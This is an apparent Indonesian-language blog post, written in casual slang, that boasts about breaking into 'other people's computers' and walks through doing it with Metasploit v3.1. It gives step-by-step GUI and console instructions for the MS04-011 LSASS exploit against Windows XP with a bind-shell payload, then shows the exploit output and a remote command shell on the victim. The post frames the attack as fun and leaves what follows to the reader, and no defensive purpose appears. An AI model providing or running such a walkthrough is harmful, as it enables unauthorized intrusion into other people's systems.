huhehehe…senang..senang..bisa liat daleman komputer org ![]()
Tinggal gunain software Metasploit, truz cari bug yg sering ada
di komputer target…truz..exploits dah..
dapet tuch konsol komputer org..ckckckc
Nich diriku kasih cara2 masuk k konsol orang ngegunain
software metasploit v3-1…
cara pertama pk cara GUI..
1. Jalanin softwarenya….
2. Udah ntuh…klik exploits–>windows–>smb
3. truz..double klick ms04_011_lsass, udah di double klik
muncul kotak dialog. pilih system operasi target…
jika kita tidak mengetahui sistem operasi target kita pilih
Automatic Targetting truz..klik Forward
4. lalu..pilih jenis payloadnya ato option yang akan qta lakukan
pada komputer si target, pilih generic/shell_bind_tcp
karena qta akan masuk ke konsolnya aja..truz..klik Forward
5. Sesudah ntuh masukan IP si target, pada RHOST.
truz..klik Forward
6. lalu klik Apply
7. Tunggu sebentar…(lagi connecting /u exploit
),
klo sudah konek, maka akan muncul ip si target di Sessions.
8. Double klik IP si target pada session u/ msk ke konsol si target…
9. Udah..dech..konsol komputer c target sudah di tangan anda..
selanjutnya terserah anda![]()
cara kedua lewat Console…
1. Jalanin programnya…
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 auxmsf >
4. liat smua exploit yg ada...(tuk iseng doank
)
msf > show exploits
5. load modul exploit, qta gunain exploit lsass spt cara diatas
msf > use windows/smb/ms04_011_lsass
6. Tentukan sistem operasi target... misal target menggunakan XP
maka targetnya spt berikut
msf exploit(ms04_011_lsass) > set target 2
target => 2
7. Tampilin payloadnya apa aja yg ada..
msf exploit(ms04_011_lsass) > show payloads
8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14
msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14
10. Udah dech...tinggal jalanin perintah exploit...
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:
192.168.113.14[\lsarpc]…
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:
192.168.113.14[\lsarpc]…
[*] Getting OS information…
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened
(192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request
lihat di sana ada tulisan Command shell session 3 opened…
ini menandakan qta sudah berhasil msk…dan shell qta di simpan di session 3.
11. Selanjutnya qta tampilin…isi session qta
msf exploit(ms04_011_lsass) > sessions -l
Active sessions
===============Id Description Tunnel
– ———– ——
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444
12. Udah itu…kita masuk ke session 3 tersebut, untuk masuk ke konsol
msf exploit(ms04_011_lsass) > sessions -i 3
[*] Starting interaction with 3…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
13. Hehe…dah masuk tuch ![]()


